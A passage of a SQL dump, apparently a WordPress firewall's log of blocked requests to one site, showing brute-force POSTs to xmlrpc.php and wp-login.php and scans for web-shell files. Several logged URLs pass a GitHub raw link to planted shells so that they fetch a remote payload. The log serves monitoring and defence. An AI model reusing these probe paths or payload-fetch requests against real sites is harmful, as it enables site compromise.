Firefox\\/96\"}','l2u0cAmsbVBEPiyUQMHnLKO8',0,1665871811.3133,17635,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dtDj0RpqFNZOyi4eE5lCKkSJ',0,1665881293.8076,713,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Vzgf4IeZKwQNXMn9qtiy6vlJ',0,1665881288.7347,297,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BNcqEwg73oueaW6Y5PpsIhTS',0,1665881285.7699,280,'','GET',403,0,700,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','IO8UmkM37W6YLls1XueGRQ9J',0,1665878811.1337,19428,'','POST',403,0,515,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0OQwHcfAKJEumdhkjrWDe6ML',0,1665878827.3402,3223,'','POST',403,0,515,0,1,'',0),('124.222.127.109',2094956397,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','71tzmZiYcPefuXr0SvqnbdUG',0,1665877887.5834,1526,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GRa2QYKncz3lyMi5H67Ovfwk',0,1665877566.6596,9242,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EzkKnMZ0CxYJ8mAih9lOtjPa',0,1665877586.5836,587,'','POST',403,0,515,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kl8VXNzL3r4hFsTeCUf2Ytb5',0,1665876447.9781,10652,'','POST',403,0,515,0,1,'',0),('137.184.209.117',2310590837,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nrq2dAypIOkz4Z8tRlvPeFfM',0,1665876440.7393,17870,'','POST',403,0,515,0,1,'',0),('213.152.186.19',3583556115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XFC8jy0sYS5tv2LhODgeaRU7',0,1665875761.5023,18757,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tfdrF4sDkUpKTQgjwmyiM0ZA',0,1665875235.5444,7984,'','POST',403,0,515,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PMRzrtWjbSwILZHhG71B9y8T',0,1665874944.0823,6244,'','POST',403,0,515,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fK7urwlTqPhs4CeU2AI0GE3V',0,1665874943.0999,2983,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','i5EHhl28SGptsOumFqdNbV0g',0,1665881282.4423,333,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tnaiVzH0ZRfNeDxUcY25Im4T',0,1665881276.4519,276,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','T4QU5MvFCXRArO3jc9IK7Lsb',0,1665881274.1594,308,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xmclQPpuSt5fDvbi6MZjFTdK',0,1665881271.4336,321,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','a9sXSYMC7HZPLWi3OAF25yme',0,1665881273.0558,295,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YJVHpozbZImWr62qTSiQRdD5',0,1665881270.0170,280,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LY4gH9CyiK1OAGfU6eQ7ImRo',0,1665881265.8738,296,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6jS2rm7Mvi3LRENVenyPTWBq',0,1665881262.6555,273,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mIPTxXtFdMw9cOy8lD3ZjrAp',0,1665881260.8048,275,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8XauBem5gNxRfck3Qry9T4vA',0,1665881259.6008,286,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','W8txkJSsFDegmYy2hCvMcdwH',0,1665881254.0459,275,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','z9cwp0SaUXGNO8iRYxAIrbjZ',0,1665881251.9694,296,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','e8JsDuNaO7xFhKI6fTCnzjtl',0,1665881241.6572,7208,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Rba7jTDxAwyNHGhmSk3egJpd',0,1665881186.1405,302,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8bwrsDuh1iGB4pZ0kq3aTRLe',0,1665881184.7761,323,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','U0KrDbdGOyBN5ECwJS47ZWIV',0,1665881181.9920,282,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','K60i3xjbW5yYfmrGkS47NR9O',0,1665881161.3277,11427,'','GET',403,0,700,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3UfDnElCgPzTxd6qZVw10QLR',0,1665880409.3362,3158,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YFoufxM0j1NnV6aKvsmkPtRA',0,1665879133.3678,1194,'','POST',403,0,515,0,1,'',0),('192.163.194.31',3231957535,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nKI2sBdg8WXYT7xZiEHt9Mk0',0,1665880054.0603,18341,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','m5xqPvRsa9iGAkXK4Wr7zgp1',0,1665886442.4287,20353,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','4W1EqJI0XFVOHdyv7fisK8Dn',0,1665886442.4361,20343,'','POST',403,0,515,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tPqbxRlve8U2hCcYNg7nWSQr',0,1665885478.4685,18220,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iWmFPAID0UZBkcpoChVOa1XL',0,1665884191.4102,5039,'','POST',403,0,515,0,1,'',0),('101.99.95.162',1701011362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fAjKypn5k7Mae68BsxirvVIu',0,1665884190.0267,6108,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CEczKsBu20beH9rYlaL31T4p',0,1665883839.8074,18920,'','POST',403,0,515,0,1,'',0),('131.72.236.73',2202594377,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VKQ3tgOLU5XPhNWpuFDHwbd0',0,1665883839.8221,18878,'','POST',403,0,515,0,1,'',0),('125.227.127.195',2112061379,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U9JxhQDKIgticByzNl6MwmLv',0,1665882880.3962,2407,'','POST',403,0,515,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','rhkS35GONUbi6yFx7QdjIou1',0,1665882806.8623,1548,'','POST',403,0,600,0,1,'',0),('103.74.118.242',1732933362,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mCN2WTXgZpHYcqL4ARerwoUy',0,1665894574.4981,16640,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nHP30Ce8BENTjQVLyqMhFWOw',0,1665894572.5029,18635,'','POST',403,0,515,0,1,'',0),('121.40.238.50',2032725554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','avs5pCori7qGlV0IeQO4tjH3',0,1665890834.5128,17812,'','POST',403,0,515,0,1,'',0),('103.110.84.132',1735283844,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8ZrI97yOwRoFXPH4hnfzYUWm',0,1665892217.7565,18887,'','POST',403,0,515,0,1,'',0),('67.222.131.158',1138656158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','W7hnC8Z1fBeKsuOTcNF2IU3p',0,1665890845.7551,6562,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','5UfWb6HMczL813mBtpEwglnI',0,1665890498.4639,17553,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','TQFrWc72on5ul0kjbPdpvHeR',0,1665890500.2106,15714,'','POST',403,0,515,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BUYQAj8pdFu2T1wvlmP0yMiK',0,1665899944.5972,12777,'','POST',403,0,515,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7lYBkPOVKEvozfgAFt1p6byq',0,1665899938.1673,19206,'','POST',403,0,515,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w72pkuPnlv4txCHTyDBdiFqO',0,1665899077.5056,18830,'','POST',403,0,515,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Srz1fOuP5iF3AZqXtpoge0xn',0,1665899078.7403,17596,'','POST',403,0,515,0,1,'',0),('134.19.179.147',2249438099,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ebULFnMsiyNExwXSl416fJqo',0,1665898591.5197,1538,'','POST',403,0,515,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','23JOiGsAU7ym1E9FtfNgDIKk',0,1665898425.8134,1706,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YHOyjzqMSL3XUErQ4Z7RgW5t',0,1665898424.4623,2644,'','POST',403,0,515,0,1,'',0),('45.173.240.6',766373894,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iQwJ5sm8VMGrAEqRec3Yz0Bd',0,1665897547.2249,19019,'','POST',403,0,515,0,1,'',0),('198.211.125.40',3335748904,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lUMFuEdnVPsGO1Qqw6kA4S3W',0,1665897563.7842,2459,'','POST',403,0,515,0,1,'',0),('185.45.66.25',3106751001,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KQCitlBbyVTLq8oAFMrXe9U1',0,1665895872.6563,18796,'','POST',403,0,515,0,1,'',0),('207.154.234.6',3483036166,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i3nW4cRIqx62dypJlXjaCs9b',0,1665895629.7582,6153,'','POST',403,0,515,0,1,'',0),('213.152.162.79',3583550031,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w6WClFtnLbApEPkR0TMYmINq',0,1665895531.5765,19601,'','POST',403,0,515,0,1,'',0),('208.113.149.124',3497104764,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TSomvc628pzKVjiQuHn95sB3',0,1665895634.0471,1555,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','0KXMBvZ96rwxDO7EFcJfjRIy',0,1665895065.2454,505,'','POST',403,0,600,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8g7rY5a1N9C2MoyTx3jckiVv',0,1665894875.5679,1238,'','POST',403,0,515,0,1,'',0),('195.211.45.155',3285396891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LkzOca9y28UnGil4f1ZKCYXT',0,1665896775.3513,18849,'','POST',403,0,515,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NaKnFPfSC7lzYXDOmRrhk5JH',0,1665896698.7853,18485,'','POST',403,0,515,0,1,'',0),('85.128.143.162',1434488738,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GcxezLBfCTbQHta0h51rpm7Y',0,1665896492.1108,479,'','POST',403,0,515,0,1,'',0),('200.147.58.16',3365091856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VLg0jodnQ6XFcNvSrJ5Y1mT7',0,1665896482.0063,9031,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8hY93GVTI2MxiRJfOzAg6woq',0,1665904148.4955,20111,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6sX7BUPKONmuZJrSHYqhAgd1',0,1665904149.5742,19032,'','POST',403,0,515,0,1,'',0),('40.70.241.53',675737909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UEWB0mTRs7jctbNFhGz24aZ1',0,1665903512.3743,18440,'','POST',403,0,515,0,1,'',0),('152.32.211.172',2552288172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nlpNYDE4gAVFiP97qdGcLb6j',0,1665903288.6821,15625,'','POST',403,0,515,0,1,'',0),('152.32.211.172',2552288172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HMALKYBhZr8xd1IaDl2jE7J6',0,1665903286.5543,17682,'','POST',403,0,515,0,1,'',0),('213.152.161.234',3583549930,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hO4TeKQGmnkbiwdxN35HE0Xo',0,1665903042.4482,18393,'','POST',403,0,515,0,1,'',0),('128.199.68.99',2160542819,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zSfqVgwAlGpP9FCkay746nvi',0,1665902670.7903,17611,'','POST',403,0,515,0,1,'',0),('34.79.7.22',575604502,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','k2eHGcMo9KxvSJUsnyTbjCEZ',0,1665902682.4721,5918,'','POST',403,0,515,0,1,'',0),('109.205.182.169',1842198185,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zTXZvHnIiL3D7qBWNcKwCOuy',0,1665901855.6421,1573,'','POST',403,0,515,0,1,'',0),('167.172.79.125',2813087613,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1K9ne7DblMU8AH3FOsif2LzJ',0,1665901841.7006,15038,'','POST',403,0,515,0,1,'',0),('213.152.162.165',3583550117,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qVGwJFinpr1Yb345DRXmTBjK',0,1665901726.9284,18750,'','POST',403,0,515,0,1,'',0),('103.221.220.140',1742593164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gwiHXxo17FzDeAapdcObVln4',0,1665901634.6943,2367,'','POST',403,0,515,0,1,'',0),('103.221.220.140',1742593164,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','43PUmLaHyZgdfbpWGNR8oEQs',0,1665901633.8525,2753,'','POST',403,0,515,0,1,'',0),('205.185.124.182',3451485366,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','QTt1IaLpqxdGm5AX3obKjkEr',0,1665901559.0805,521,'','POST',403,0,600,0,1,'',0),('198.98.50.19',3328324115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','7AtZgQNdHXTykr8UMpwJCm5q',0,1665901029.4841,1332,'','POST',403,0,600,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2qNlPUjr7biph46d0AESD5vX',0,1665900764.9560,17621,'','POST',403,0,515,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qoG4kzalJu0jOt8veYdTUxVW',0,1665900766.1582,16400,'','POST',403,0,515,0,1,'',0),('171.244.16.103',2884898919,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 